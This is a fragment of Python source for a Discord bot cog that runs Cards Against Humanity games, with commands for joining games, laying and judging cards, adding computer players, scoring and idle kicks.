self.showHand(ctx, ctx.author) cards.append(user["Hand"][c - 1]["Text"]) # Remove from user's hand card = sorted(card, key=lambda card: int(card), reverse=True) for c in card: user["Hand"].pop(int(c) - 1) # Valid cards newSubmission = {"By": user, "Cards": cards} else: cardSpeak = "card" try: card = int(card) except Exception: await ctx.author.send( f"You need to lay a valid card with `{ctx.prefix}lay [card number]`" ) return await self.showHand(ctx, ctx.author) if card < 1 or card > len(user["Hand"]): await ctx.author.send(f"Card numbers must be between 1 and {len(user["Hand"])}.") return await self.showHand(ctx, ctx.author) # Valid card newSubmission = {"By": user, "Cards": [user["Hand"].pop(card - 1)["Text"]]} userGame["Submitted"].append(newSubmission) # Shuffle cards shuffle(userGame["Submitted"]) user["Laid"] = True await ctx.author.send(f"You submitted your {cardSpeak}!") await self.checkSubmissions(ctx, userGame, user) @commands.command() async def pick(self, ctx, *, card=None): """As the judge - pick the winning card(s).""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game msg = f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." return await ctx.author.send(msg) userGame["Time"] = int(time.time()) isJudge = False for member in userGame["Members"]: if member["User"] == ctx.author: member["Time"] = int(time.time()) user = member index = userGame["Members"].index(member) if index == userGame["Judge"]: isJudge = True if not isJudge: msg = "You're not the judge - I guess you'll have to wait your turn." return await ctx.author.send(msg) # Am judge totalUsers = len(userGame["Members"]) - 1 submitted = len(userGame["Submitted"]) if submitted < totalUsers: if totalUsers - submitted == 1: msg = "Still waiting on 1 card..." else: msg = f"Still waiting on {totalUsers - submitted} cards..." await ctx.author.send(msg) return try: card = int(card) - 1 except Exception: card = -1 if card < 0 or card >= totalUsers: return await ctx.author.send(f"Your pick must be between 1 and {totalUsers}.") # Pick is good! await self.winningCard(ctx, userGame, card) @commands.command() async def hand(self, ctx): """Shows your hand.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) await self.showHand(ctx, ctx.author) userGame["Time"] = currentTime = int(time.time()) @commands.command() async def newcah(self, ctx): """Starts a new Cards Against Humanity game.""" # if not await self.checkPM(ctx.message): # return # Check if the user is already in game userGame = await self.userGame(ctx.author) if userGame: # Already in a game return await ctx.author.send( f"You're already in a game (id: *{userGame["ID"]}*)\nType `{ctx.prefix}leavecah` to leave that game." ) # Not in a game - create a new one gameID = self.randomID() currentTime = int(time.time()) newGame = { "ID": gameID, "Members": [], "Discard": [], "BDiscard": [], "Judge": -1, "Time": currentTime, "BlackCard": None, "Submitted": [], "NextHand": asyncio.Event(), "Judging": False, "Timeout": True, } member = { "ID": ctx.author.id, "User": ctx.author, "Points": 0, "Won": [], "Hand": [], "Laid": False, "Refreshed": False, "IsBot": False, "Creator": True, "Task": None, "Time": currentTime, } newGame["Members"].append(member) newGame["Running"] = True task = self.bot.loop.create_task(self.gameCheckLoop(ctx, newGame)) task = self.bot.loop.create_task(self.checkCards(ctx, newGame)) self.games.append(newGame) # Tell the user they created a new game and list its ID await ctx.message.channel.send(f"You created game id: *{gameID}*") await self.drawCards(ctx.author) # await self.showHand(ctx, ctx.author) # await self.nextPlay(ctx, newGame) @commands.command() async def leavecah(self, ctx): """Leaves the current game you're in.""" removeCheck = await self.removeMember(ctx.author) if not removeCheck: msg = "You are not in a game." await ctx.message.channel.send(msg) return if self.checkGame(removeCheck): # await self.nextPlay(ctx, removeCheck) """# Start the game loop event = removeCheck['NextHand'] self.bot.loop.call_soon_threadsafe(event.set)""" # Player was removed - try to handle it calmly... await self.checkSubmissions(ctx, removeCheck) @commands.command() async def joincah(self, ctx, *, id=None): """Join a Cards Against Humanity game. If no id or user is passed, joins a random game.""" # if not await self.checkPM(ctx.message): # return # Check if the user is already in game userGame = await self.userGame(ctx.author) isCreator = False if userGame: # Already in a game return await ctx.message.channel.send( f"You're already in a game (id: *{userGame["ID"]}*)\nType `{ctx.prefix}leavecah` to leave that game." ) if len(self.games): if id: game = self.gameForID(id) if game == None: # That id doesn't exist - or is possibly a user # If user, has to be joined from server chat if not ctx.message.guild: return await ctx.message.channel.send( f"I couldn't find a game attached to that id. If you are trying to join a user - run the `{ctx.prefix}joincah [user]` command in a channel on a server you share with that user." ) else: # We have a server - let's try for a user member = self.memberforname(id, ctx.message.guild) if not member: # Couldn't find user! return await ctx.message.channel.send( f"I couldn't find a game attached to that id. If you are trying to join a user - run the `{ctx.prefix}joincah [user]` command in a channel on a server you share with that user." ) # Have a user - check if they're in a game game = await self.userGame(member) if not game: # That user is NOT in a game! return await ctx.message.channel.send( "That user doesn't appear to be playing." ) else: game = random.choice(self.games) else: # No games - create a new one gameID = self.randomID() currentTime = int(time.time()) game = { "ID": gameID, "Members": [], "Discard": [], "BDiscard": [], "Judge": -1, "Time": currentTime, "BlackCard": None, "Submitted": [], "NextHand": asyncio.Event(), "Judging": False, "Timeout": True, } game["Running"] = True task = self.bot.loop.create_task(self.gameCheckLoop(ctx, game)) task = self.bot.loop.create_task(self.checkCards(ctx, game)) self.games.append(game) # Tell the user they created a new game and list its ID await ctx.message.channel.send(f"**You created game id:** ***{gameID}***") isCreator = True # Tell everyone else you joined for member in game["Members"]: if member["IsBot"]: continue await member["User"].send(f"***{self.displayname(ctx.author)}*** **joined the game!**") # We got a user! currentTime = int(time.time()) member = { "ID": ctx.author.id, "User": ctx.author, "Points": 0, "Won": [], "Hand": [], "Laid": False, "Refreshed": False, "IsBot": False, "Creator": isCreator, "Task": None, "Time": currentTime, } game["Members"].append(member) await self.drawCards(ctx.author) if len(game["Members"]) == 1: # Just created the game await self.drawCards(ctx.author) else: await ctx.message.channel.send( f"**You've joined game id:** ***{game["ID"]}!***\n\nThere are *{len(game["Members"])} users* in this game." ) # Check if adding put us at minimum members if len(game["Members"]) - 1 < self.minMembers: # It was - *actually* start a game event = game["NextHand"] self.bot.loop.call_soon_threadsafe(event.set) else: # It was not - just incorporate new players await self.checkSubmissions(ctx, game) # Reset judging flag to retrigger actions game["Judging"] = False # Show the user the current card and their hand await self.showPlay(ctx, member["User"]) await self.showHand(ctx, member["User"]) event = game["NextHand"] game["Time"] = int(time.time()) @commands.command() async def joinbot(self, ctx): """Adds a bot to the game. Can only be done by the player who created the game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) botCount = 0 for member in userGame["Members"]: if member["IsBot"]: botCount += 1 continue if member["User"] == ctx.author: if not member["Creator"]: # You didn't make this game msg = "Only the player that created the game can add bots." await ctx.author.send(msg) return member["Time"] = int(time.time()) # We are the creator - let's check the number of bots if botCount >= self.maxBots: # Too many bots! return await ctx.author.send(f"You already have enough bots (max is {self.maxBots}).") # We can get another bot! botID = self.randomBotID(userGame) lobot = { "ID": botID, "User": None, "Points": 0, "Won": [], "Hand": [], "Laid": False, "Refreshed": False, "IsBot": True, "Creator": False, "Task": None, } userGame["Members"].append(lobot) await self.drawCards(lobot["ID"]) for member in userGame["Members"]: if member["IsBot"]: continue await member["User"].send(f"***{self.botName} ({botID})*** **joined the game!**") # await self.nextPlay(ctx, userGame) # Check if adding put us at minimum members if len(userGame["Members"]) - 1 < self.minMembers: # It was - *actually* start a game event = userGame["NextHand"] self.bot.loop.call_soon_threadsafe(event.set) else: # It was not - just incorporate new players await self.checkSubmissions(ctx, userGame) # Reset judging flag to retrigger actions userGame["Judging"] = False # Schedule stuff task = asyncio.ensure_future(self.botPick(ctx, lobot, userGame)) lobot["Task"] = task @commands.command() async def joinbots(self, ctx, number=None): """Adds bots to the game. Can only be done by the player who created the game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) botCount = 0 for member in userGame["Members"]: if member["IsBot"]: botCount += 1 continue if member["User"] == ctx.author: if not member["Creator"]: # You didn't make this game msg = "Only the player that created the game can add bots." await ctx.author.send(msg) return member["Time"] = int(time.time()) if number == None: # No number specified - let's add the max number of bots number = self.maxBots - botCount try: number = int(number) except Exception: msg = "Number of bots to add must be an integer." await ctx.author.send(msg) return # We are the creator - let's check the number of bots if botCount >= self.maxBots: # Too many bots! return await ctx.author.send(f"You already have enough bots (max is {self.maxBots}).") if number > (self.maxBots - botCount): number = self.maxBots - botCount if number == 1: msg = f"**Adding {number} bot:**\n\n" else: msg = f"**Adding {number} bots:**\n\n" newBots = [] for i in range(0, number): # We can get another bot! botID = self.randomBotID(userGame) lobot = { "ID": botID, "User": None, "Points": 0, "Won": [], "Hand": [], "Laid": False, "Refreshed": False, "IsBot": True, "Creator": False, "Task": None, } userGame["Members"].append(lobot) newBots.append(lobot) await self.drawCards(lobot["ID"]) msg += f"***{self.botName} ({botID})*** **joined the game!**\n" # await self.nextPlay(ctx, userGame) for member in userGame["Members"]: if member["IsBot"]: continue await member["User"].send(msg) # Check if adding put us at minimum members if len(userGame["Members"]) - number < self.minMembers: # It was - *actually* start a game event = userGame["NextHand"] self.bot.loop.call_soon_threadsafe(event.set) else: # It was not - just incorporate new players await self.checkSubmissions(ctx, userGame) # Reset judging flag to retrigger actions game["Judging"] = False for bot in newBots: # Schedule stuff task = asyncio.ensure_future(self.botPick(ctx, bot, userGame)) bot["Task"] = task @commands.command() async def removebot(self, ctx, *, id=None): """Removes a bot from the game. Can only be done by the player who created the game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) botCount = 0 for member in userGame["Members"]: if member["IsBot"]: botCount += 1 continue if member["User"] == ctx.author: if not member["Creator"]: # You didn't make this game return await ctx.author.send( "Only the player that created the game can remove bots." ) member["Time"] = int(time.time()) # We are the creator - let's check the number of bots if id == None: # Just remove the first bot we find for member in userGame["Members"]: if member["IsBot"]: await self.removeMember(member["ID"]) """# Start the game loop event = userGame['NextHand'] self.bot.loop.call_soon_threadsafe(event.set)""" # Bot was removed - try to handle it calmly... return await self.checkSubmissions(ctx, userGame) msg = "No bots to remove!" await ctx.author.send(msg) return else: # Remove a bot by id if not await self.removeMember(id): # not found return await ctx.author.send( f"I couldn't locate that bot on this game. If you're trying to remove a player, try the `{ctx.prefix}removeplayer [name]` command." ) # await self.nextPlay(ctx, userGame) """# Start the game loop event = userGame['NextHand'] self.bot.loop.call_soon_threadsafe(event.set)""" # Bot was removed - let's try to handle it calmly... await self.checkSubmissions(ctx, userGame) @commands.command() async def cahgames(self, ctx): """Displays up to 10 CAH games in progress.""" shuffledGames = list(self.games) random.shuffle(shuffledGames) if not len(shuffledGames): await ctx.message.channel.send("No games being played currently.") return max = 10 if len(shuffledGames) < 10: max = len(shuffledGames) msg = "__Current CAH Games__:\n\n" for i in range(0, max): playerCount = 0 botCount = 0 gameID = shuffledGames[i]["ID"] for j in shuffledGames[i]["Members"]: if j["IsBot"]: botCount += 1 else: playerCount += 1 botText = f"{botCount} bot" if not botCount == 1: botText += "s" playerText = f"{playerCount} player" if not playerCount == 1: playerText += "s" msg += f"{i + 1}. {gameID} - {playerText} | {botText}\n" await ctx.message.channel.send(msg) @commands.command() async def score(self, ctx): """Display the score of the current game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) stat_embed = discord.Embed(color=discord.Color.purple()) stat_embed.set_author(name="Current Score") stat_embed.set_footer(text=f"Cards Against Humanity - id: {userGame["ID"]}") await ctx.author.send(embed=stat_embed) users = sorted(userGame["Members"], key=lambda card: int(card["Points"]), reverse=True) msg = "" i = 0 if len(users) > 10: msg += f"__10 of {len(users)} Players:__\n\n" else: msg += "__Players:__\n\n" for user in users: i += 1 if i > 10: break if user["Points"] == 1: if user["User"]: # Person msg += f"{i}. *{self.displayname(user["User"])}* - 1 point\n" else: # Bot msg += f"{i}. *{self.botName} ({user["ID"]})* - 1 point\n" else: if user["User"]: # Person msg += f"{i}. *{self.displayname(user["User"])}* - {user["Points"]} points\n" else: # Bot msg += f"{i}. *{self.botName} ({user["ID"]})* - {user["Points"]} points\n" await ctx.author.send(msg) @commands.command() async def laid(self, ctx): """Shows who laid their cards and who hasn't.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) stat_embed = discord.Embed(color=discord.Color.purple()) stat_embed.set_author(name="Card Check") stat_embed.set_footer(text=f"Cards Against Humanity - id: {userGame["ID"]}") await ctx.author.send(embed=stat_embed) users = sorted(userGame["Members"], key=lambda card: int(card["Laid"])) msg = "" i = 0 if len(users) > 10: msg += f"__10 of {len(users)} Players:__\n\n" else: msg += "__Players:__\n\n" for user in users: if len(userGame["Members"]) >= self.minMembers: if user == userGame["Members"][userGame["Judge"]]: continue i += 1 if i > 10: break if user["Laid"]: if user["User"]: # Person msg += f"{i}. *{self.displayname(user["User"])}* - Cards are in.\n" else: # Bot msg += f"{i}. *{self.botName} ({user["ID"]})* - Cards are in.\n" else: if user["User"]: # Person msg += f"{i}. *{self.displayname(user["User"])}* - Waiting for cards...\n" else: # Bot msg += f"{i}. *{self.botName} ({user["ID"]})* - Waiting for cards...\n" await ctx.author.send(msg) @commands.command() async def removeplayer(self, ctx, *, name=None): """Removes a player from the game. Can only be done by the player who created the game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) botCount = 0 for member in userGame["Members"]: if member["IsBot"]: botCount += 1 continue if member["User"] == ctx.author: if not member["Creator"]: # You didn't make this game msg = "Only the player that created the game can remove players." await ctx.author.send(msg) return member["Time"] = int(time.time()) # We are the creator - let's check the number of bots if name == None: # Nobody named! msg = "Okay, I removed... no one from the game..." await ctx.author.send(msg) return # Let's get the person either by name, or by id nameID = "".join(list(filter(str.isdigit, name))) for member in userGame["Members"]: toRemove = False if member["IsBot"]: continue if name.lower() == self.displayname(member["User"]).lower(): # Got em! toRemove = True elif nameID == member["ID"]: # Got em! toRemove = True if toRemove: await self.removeMember(member["ID"]) break # await self.nextPlay(ctx, userGame) if toRemove: """# Start the game loop event = userGame['NextHand'] self.bot.loop.call_soon_threadsafe(event.set)""" # Player was removed - try to handle it calmly... await self.checkSubmissions(ctx, userGame) else: msg = f"I couldn't locate that player on this game. If you're trying to remove a bot, try the `{ctx.prefix}removebot [id]` command." return await ctx.author.send(msg) @commands.command() async def flushhand(self, ctx): """Flushes the cards in your hand - can only be done once per game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) if userGame["Judge"] == -1: msg = "The game hasn't started yet. Probably not worth it to flush your hand before you get it..." await ctx.author.send(msg) return for member in userGame["Members"]: if member["IsBot"]: continue if member["User"] == ctx.author: member["Time"] = int(time.time()) # Found us! if member["Refreshed"]: # Already flushed their hand msg = "You have already flushed your hand this game." await ctx.author.send(msg) return else: member["Hand"] = [] await self.drawCards(member["ID"]) member["Refreshed"] = True msg = "Flushing your hand!" await ctx.author.send(msg) await self.showHand(ctx, ctx.author) return @commands.command() async def idlekick(self, ctx, *, setting=None): """Sets whether or not to kick members if idle for 5 minutes or more. Can only be done by the player who created the game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) botCount = 0 for member in userGame["Members"]: if member["IsBot"]: botCount += 1 continue if member["User"] == ctx.author: if not member["Creator"]: # You didn't make this game msg = "Only the player that created the game can remove bots." await ctx.author.send(msg) return # We are the creator - let's check the number of bots if setting == None: # Output idle kick status if userGame["Timeout"]: await ctx.message.channel.send("Idle kick is enabled.") else: await ctx.message.channel.send("Idle kick is disabled.") return elif setting.lower() == "yes" or setting.lower() == "on" or setting.lower() == "true": setting = True elif setting.lower() == "no" or setting.lower() == "off" or setting.lower() == "false": setting = False else: setting = None if setting == True: if userGame["Timeout"] == True: msg = "Idle kick remains enabled." else: msg = "Idle kick now enabled." for member in userGame["Members"]: member["Time"] = int(time.time()) else: if userGame["Timeout"] == False: msg = "Idle kick remains disabled." else: msg = "Idle kick now disabled." userGame["Timeout"] = setting await ctx.message.channel.send(msg) @commands.command() async def cahcredits(self, ctx): """Code credits.""" await ctx.send( "```\nThis cog is made possible by CorpBot.\nPlease visit https://github.com/corpnewt/CorpBot.py for more information.\n```" )
import asyncio import discord import html import json import random import time from random import shuffle from redbot.core import commands from redbot.core.data_manager import bundled_data_path class CardsAgainstHumanity(commands.Cog): def __init__(self, bot): self.bot = bot self.games = [] self.maxBots = ( 5 # Max number of bots that can be added to a game - don't count toward max players ) self.maxPlayers = 10 # Max players for ranjom joins self.maxDeadTime = 3600 # Allow an hour of dead time before killing a game self.checkTime = 300 # 5 minutes between dead time checks self.winAfter = 10 # 10 wins for the game self.botWaitMin = ( 5 # Minimum number of seconds before the bot makes a decision (default 5) ) self.botWaitMax = 30 # Max number of seconds before a bot makes a decision (default 30) self.userTimeout = 500 # 5 minutes to timeout self.utCheck = 30 # Check timeout every 30 seconds self.utWarn = 60 # Warn the user if they have 60 seconds or less before being kicked self.charset = "1234567890" self.botName = "Rando Cardrissian" self.minMembers = 3 self.bot.loop.create_task(self.checkDead()) self.bot.loop.create_task(self.checkUserTimeout()) def cleanJson(self, json): json = html.unescape(json) # Clean out html formatting json = json.replace("_", "[blank]") json = json.replace("<br>", "\n") json = json.replace("<br/>", "\n") json = json.replace("<i>", "*") json = json.replace("</i>", "*") return json def displayname(self, member: discord.Member): # A helper function to return the member's display name nick = name = None try: nick = member.nick except AttributeError: pass try: name = member.name except AttributeError: pass if nick: return nick if name: return name return None def memberforname(self, name, server): # Check nick first - then name for member in server.members: if member.nick: if member.nick.lower() == name.lower(): return member for member in server.members: if member.name.lower() == name.lower(): return member # No member yet - try ID memID = "".join(list(filter(str.isdigit, name))) newMem = self.memberforid(memID, server) if newMem: return newMem return None @staticmethod def memberforid(checkid, server): for member in server.members: if str(member.id) == str(checkid): return member return None def getreadabletimebetween(self, first, last): # A helper function to make a readable string between two times timeBetween = int(last - first) weeks = int(timeBetween / 604800) days = int((timeBetween - (weeks * 604800)) / 86400) hours = int((timeBetween - (days * 86400 + weeks * 604800)) / 3600) minutes = int((timeBetween - (hours * 3600 + days * 86400 + weeks * 604800)) / 60) seconds = int(timeBetween - (minutes * 60 + hours * 3600 + days * 86400 + weeks * 604800)) msg = "" if weeks > 0: if weeks == 1: msg = f"{msg}{str(weeks)} week, " else: msg = f"{msg}{str(weeks)} weeks, " if days > 0: if days == 1: msg = f"{msg}{str(days)} day, " else: msg = f"{msg}{str(days)} days, " if hours > 0: if hours == 1: msg = f"{msg}{str(hours)} hour, " else: msg = f"{msg}{str(hours)} hours, " if minutes > 0: if minutes == 1: msg = f"{msg}{str(minutes)} minute, " else: msg = f"{msg}{str(minutes)} minutes, " if seconds > 0: if seconds == 1: msg = f"{msg}{str(seconds)} second, " else: msg = f"{msg}{str(seconds)} seconds, " if not msg: return "0 seconds" else: return msg[:-2] async def checkUserTimeout(self): while True: # Wait first - then check await asyncio.sleep(self.utCheck) for game in self.games: if not game["Timeout"]: continue if len(game["Members"]) >= self.minMembers: # Game is started for member in game["Members"]: if member["IsBot"]: continue if game["Judging"]: if not member == game["Members"][game["Judge"]]: # Not the judge - don't hold against the user member["Time"] = int(time.time()) continue else: # Not judging if member == game["Members"][game["Judge"]]: # The judge - don't hold that against them member["Time"] = int(time.time()) continue currentTime = int(time.time()) userTime = member["Time"] downTime = currentTime - userTime # Check if downTime results in a kick if downTime >= self.userTimeout: # You gettin kicked, son. await self.removeMember(member["User"]) self.checkGame(game) continue # Check if downTime is in warning time if downTime >= (self.userTimeout - self.utWarn): # Check if we're at warning phase if self.userTimeout - downTime >= (self.utWarn - self.utCheck): kickTime = self.userTimeout - downTime if kickTime % self.utCheck: # Kick time isn't exact time - round out to the next loop kickTime = kickTime - (kickTime % self.utCheck) + self.utCheck # Warning time! timeString = self.getreadabletimebetween(0, kickTime) await member["User"].send( f"**WARNING** - You will be kicked from the game if you do not make a move in *{timeString}!*" ) else: for member in game["Members"]: # Reset timer member["Time"] = int(time.time()) async def checkDead(self): while True: # Wait first - then check await asyncio.sleep(self.checkTime) for game in self.games: gameTime = game["Time"] currentTime = int(time.time()) timeRemain = currentTime - gameTime if timeRemain > self.maxDeadTime: # Game is dead - quit it and alert members for member in game["Members"]: if member["IsBot"]: # Clear pending tasks and set to None if not member["Task"] == None: task = member["Task"] if not task.done(): task.cancel() member["Task"] = None continue await member["User"].send( f"Game id: *{game['ID']}* has been closed due to inactivity." ) # Set running to false game["Running"] = False self.games.remove(game) async def checkPM(self, message): # Checks if we're talking in PM, and if not - outputs an error if isinstance(message.channel, discord.abc.PrivateChannel): # PM return True else: # Not in PM await message.channel.send("Cards Against Humanity commands must be run in PM.") return False def randomID(self, length=8): # Create a random id that doesn't already exist while True: # Repeat until found newID = "".join(random.choice(self.charset) for i in range(length)) exists = False for game in self.games: if game["ID"] == newID: exists = True break if not exists: break return newID def randomBotID(self, game, length=4): # Returns a random id for a bot that doesn't already exist while True: # Repeat until found newID = "".join(random.choice(self.charset) for i in range(length)) exists = False for member in game["Members"]: if member["ID"] == newID: exists = True break if not exists: break return newID async def userGame(self, user): # Returns the game the user is currently in if not len(str(user)) == 4: if not type(user) is int: # Assume it's a discord.Member/User user = user.id for game in self.games: for member in game["Members"]: if member["ID"] == user: # Found our user return game return None def gameForID(self, id): # Returns the game with the passed id for game in self.games: if game["ID"] == id: return game return None async def removeMember(self, user, game=None): if not len(str(user)) == 4: if not type(user) is int: # Assume it's a discord.Member/User user = user.id outcome = False removed = None if not game: game = await self.userGame(user) if game: for member in game["Members"]: if member["ID"] == user: removed = member outcome = True judgeChanged = False # Reset judging flag to retrigger actions game["Judging"] = False # Get current Judge - only if game has started if len(game["Members"]) >= self.minMembers: judge = game["Members"][game["Judge"]] game["Members"].remove(member) # Check if we're removing the current judge if judge == member: # Judge will change judgeChanged = True # Find out if our member was the last in line if game["Judge"] >= len(game["Members"]): game["Judge"] = 0 # Reset judge var judge = game["Members"][game["Judge"]] else: # Judge didn't change - so let's reset judge index index = game["Members"].index(judge) game["Judge"] = index else: judge = None # Just remove the member game["Members"].remove(member) if member["Creator"]: # We're losing the game creator - pick a new one for newCreator in game["Members"]: if not newCreator["IsBot"]: newCreator["Creator"] = True await newCreator["User"].send( "The creator of this game left. **YOU** are now the creator." ) break # Remove submissions for sub in game["Submitted"]: # Remove deleted member and new judge's submissions if sub["By"] == member or sub["By"] == judge: # Found it! game["Submitted"].remove(sub) break if member["IsBot"]: if not member["Task"] == None: task = member["Task"] if not task.done(): task.cancel() member["Task"] = None else: await member["User"].send( f"**You were removed from game id:** ***{game['ID']}.***" ) # Removed, no need to finish the loop break if not outcome: return outcome # We removed someone - let's tell the world for member in game["Members"]: if member["IsBot"]: continue if removed["IsBot"]: msg = f"***{self.botName} ({removed['ID']})*** **left the game - reorganizing...**" else: msg = f"***{self.displayname(removed['User'])}*** **left the game - reorganizing...**" # Check if the judge changed if judgeChanged: # Judge changed newJudge = game["Members"][game["Judge"]] if newJudge["IsBot"]: msg += f"\n\n***{self.botName} ({newJudge['ID']})*** **is now judging!**" # Schedule judging task else: if newJudge == member: msg += "\n\n***YOU*** **are now judging!**" else: msg += f"\n\n***{newJudge['User']}*** **is now judging!**" await member["User"].send(msg) return game def checkGame(self, game): for member in game["Members"]: if not member["IsBot"]: return True # If we got here - only bots, or empty game # Kill all bots' loops for member in game["Members"]: if member["IsBot"]: # Clear pending tasks and set to None if not member["Task"] == None: task = member["Task"] if not task.done(): task.cancel() member["Task"] = None # Set running to false game["Running"] = False self.games.remove(game) return False async def typing(self, game, typeTime=5): # Allows us to show the bot typing waitTime = random.randint(self.botWaitMin, self.botWaitMax) preType = waitTime - typeTime if preType > 0: await asyncio.sleep(preType) for member in game["Members"]: if member["IsBot"]: continue await asyncio.sleep(0.1) await asyncio.sleep(typeTime) else: for member in game["Members"]: if member["IsBot"]: continue await asyncio.sleep(0.1) await asyncio.sleep(waitTime) async def botPick(self, ctx, bot, game): # Has the bot pick their card blackNum = game["BlackCard"]["Pick"] if blackNum == 1: cardSpeak = "card" else: cardSpeak = "cards" i = 0 cards = [] while i < blackNum: randCard = random.randint(0, len(bot["Hand"]) - 1) cards.append(bot["Hand"].pop(randCard)["Text"]) i += 1 await self.typing(game) # Make sure we haven't laid any cards if bot["Laid"] == False and game["Judging"] == False: newSubmission = {"By": bot, "Cards": cards} game["Submitted"].append(newSubmission) # Shuffle cards shuffle(game["Submitted"]) bot["Laid"] = True game["Time"] = currentTime = int(time.time()) await self.checkSubmissions(ctx, game, bot) async def botPickWin(self, ctx, game): totalUsers = len(game["Members"]) - 1 submitted = len(game["Submitted"]) if submitted >= totalUsers: # Judge is a bot - and all cards are in! await self.typing(game) # Pick a winner winner = random.randint(0, totalUsers - 1) await self.winningCard(ctx, game, winner) async def checkSubmissions(self, ctx, game, user=None): totalUsers = len(game["Members"]) - 1 submitted = len(game["Submitted"]) for member in game["Members"]: msg = "" # Is the game running? if len(game["Members"]) < self.minMembers: if member["IsBot"]: # Clear pending tasks and set to None if not member["Task"] == None: task = member["Task"] if not task.done(): # Task isn't finished - we're on a new hand, cancel it task.cancel() member["Task"] = None continue # not enough members - send the embed stat_embed = discord.Embed(color=discord.Color.red()) stat_embed.set_author( name=f"Not enough players to continue! ({len(game['Members'])}/{self.minMembers})" ) stat_embed.set_footer( text=f"Have other users join with: {ctx.prefix}joincah {game['ID']}" ) await member["User"].send(embed=stat_embed) continue if member["IsBot"] == True: continue # Check if we have a user if user: blackNum = game["BlackCard"]["Pick"] if blackNum == 1: card = "card" else: card = "cards" if user["IsBot"]: msg = f"*{self.botName} ({user['ID']})* submitted their {card}! " else: if not member == user: # Don't say this to the submitting user msg = f"*{self.displayname(user['User'])}* submitted their {card}! " if submitted < totalUsers: msg += f"{submitted}/{totalUsers} cards submitted..." if len(msg): # We have something to say await member["User"].send(msg) async def checkCards(self, ctx, game): while True: if not game["Running"]: break # wait for 1 second await asyncio.sleep(1) # Check for all cards if len(game["Members"]) < self.minMembers: # Not enough members continue # Enough members - let's check if we're judging if game["Judging"]: continue # Enough members, and not judging - let's check cards totalUsers = len(game["Members"]) - 1 submitted = len(game["Submitted"]) if submitted >= totalUsers: game["Judging"] = True # We have enough cards for member in game["Members"]: if member["IsBot"]: continue msg = "All cards have been submitted!" # if await member["User"].send(msg) await self.showOptions(ctx, member["User"]) # Check if a bot is the judge judge = game["Members"][game["Judge"]] if not judge["IsBot"]: continue # task = self.bot.loop.create_task(self.botPickWin(ctx, game)) task = asyncio.ensure_future(self.botPickWin(ctx, game)) judge["Task"] = task async def winningCard(self, ctx, game, card): # Let's pick our card and alert everyone winner = game["Submitted"][card] if winner["By"]["IsBot"]: winnerName = f"{self.botName} ({winner['By']['ID']})" winner["By"]["Points"] += 1 winner["By"]["Won"].append(game["BlackCard"]["Text"]) else: winnerName = self.displayname(winner["By"]["User"]) for member in game["Members"]: if member["IsBot"]: continue stat_embed = discord.Embed(color=discord.Color.gold()) stat_embed.set_footer(text=f"Cards Against Humanity - id: {game['ID']}") index = game["Members"].index(member) if index == game["Judge"]: stat_embed.set_author(name=f"You picked {winnerName}'s card!") elif member == winner["By"]: stat_embed.set_author(name="YOU WON!!") member["Points"] += 1 member["Won"].append(game["BlackCard"]["Text"]) else: stat_embed.set_author(name=f"{winnerName} won!") if len(winner["Cards"]) == 1: msg = "The **Winning** card was:\n\n{}".format( "{}".format(" - ".join(winner["Cards"])) ) else: msg = "The **Winning** cards were:\n\n{}".format( "{}".format(" - ".join(winner["Cards"])) ) await member["User"].send(embed=stat_embed) await member["User"].send(msg) await asyncio.sleep(0.1) # await self.nextPlay(ctx, game) # Start the game loop event = game["NextHand"] self.bot.loop.call_soon_threadsafe(event.set) game["Time"] = currentTime = int(time.time()) async def gameCheckLoop(self, ctx, game): task = game["NextHand"] while True: if not game["Running"]: break # Clear the pending task task.clear() # Queue up the next hand await self.nextPlay(ctx, game) # Wait until our next clear await task.wait() async def messagePlayers(self, ctx, message, game, judge=False): # Messages all the users on in a game for member in game["Members"]: if member["IsBot"]: continue # Not bots if member is game["Members"][game["Judge"]]: # Is the judge if judge: await member["User"].send(message) else: # Not the judge await member["User"].send(message) ################################################ async def showPlay(self, ctx, user): # Creates an embed and displays the current game stats stat_embed = discord.Embed(color=discord.Color.blue()) game = await self.userGame(user) if not game: return # Get the judge's name if game["Members"][game["Judge"]]["User"] == user: judge = "**YOU** are" else: if game["Members"][game["Judge"]]["IsBot"]: # Bot judge = f"*{self.botName} ({game['Members'][game['Judge']]['ID']})* is" else: judge = f"*{self.displayname(game['Members'][game['Judge']]['User'])}* is" # Get the Black Card try: 